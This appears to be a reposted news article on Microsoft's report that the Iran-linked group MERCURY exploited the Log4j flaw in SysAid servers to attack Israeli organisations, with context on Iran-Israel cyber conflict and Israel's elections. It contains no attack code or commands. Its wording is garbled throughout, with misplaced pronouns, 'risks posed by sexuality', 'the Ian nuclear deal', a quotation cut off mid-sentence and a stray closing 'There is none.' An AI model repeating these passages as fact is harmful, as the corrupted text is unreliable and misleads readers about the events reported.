An Iran-backed cyber threat group is exploiting a vulnerability in Log4j 2 to target Israeli organizations, Microsoft warned Thursday.
In a new report, the Microsoft Threat Intelligence Center (MSTIC) and its 365 Defender Team say that malicious group MERCURY has exploited remote code execution of Apache’s Log4j 2 (aka Log4Shell) on vulnerable SysAid server instances.
Founded in Israel in 2002, SysAid has grown to become a leading provider of help desk and IT service management. According to company information, he has over 5,000 customers and partners in organizations in 140 countries.
Microsoft researchers previously rated MERCURY’s partnership with Iran’s Ministry of Information and Security (MOIS) “with a high degree of credibility.” MERCURY is also known as his MuddyWater. This is a sub-element within MOIS, according to US Cyber Command.
The group, which primarily targets other countries in the Middle East, but also included targets and the United States and India, is known for tracking dissidents of the Iranian regime. It has been fighting Israel for years since it was first identified in 2017. The current attack was observed on July 23rd and 25th, 2022.
“While MERCURY has used Log4j 2 exploits in the past, we have never seen this actor use a SysAid app as an initial access vector,” Microsoft’s report states.
“After gaining access, MERCURY establishes persistence, dumps credentials, and uses custom and well-known hacking tools, as well as built-in operating system tools for hands-on keyboard attacks, to target move laterally through the organization of
In a report submitted to U.S. President Joe Biden last month, the Department of Homeland Security’s Cyber Security Review Board (CSRB) identified vulnerabilities discovered in late 2021 in the widely used Log4j open source software library. Addressed the ongoing risks posed by sexuality.
“The Log4j event is not over. The board has assessed Log4j as an ‘inherent vulnerability’ and vulnerable instances of Log4j will remain in systems for years to come, perhaps a decade or more. Significant risks remain,” the report said.
The identity of the targeted Israeli company and the extent of the damage are currently unknown. The Israeli National Cyber Directorate (INCD) has not commented on the specific report, and there has yet to be a general response from SysAid.
Between cyber warfare, nuclear deals and endless elections
Israel is now engaged in a diplomatic blitzkrieg to prevent a revival of the Ian nuclear deal, which appears to be looming or at least involves some changes. Regardless, cyber warfare between the two countries has significantly intensified over the past few years.
In June, Israel’s cyber chief, Gabi Portnoy, said that “Iran, along with (deputy) Hezbollah and Hamas, have become the dominant cyber rivals,” adding that the “cyber He stressed the need for a dome. Just as the “Iron Dome” system protects it from missiles and rockets.
Mandiant revealed in early August that it was tracking another Iran-linked group, UNC3890. UNC3890 targeted Israeli shipping, government, energy, and healthcare organizations “via potential social engineering lures and watering holes.” The campaign, which he has been active since at least 2020, was still ongoing when the cybersecurity firm learned of its existence.
On November 1st, Israeli citizens will once again turn to elections to elect a new government for the fifth time in 3.5 years. Defense experts and cyber analysts are concerned about the possibility of foreign government-sponsored intervention (from Iran or other countries) through fake news, social engineering campaigns, etc. There is none.
Comments
Post a Comment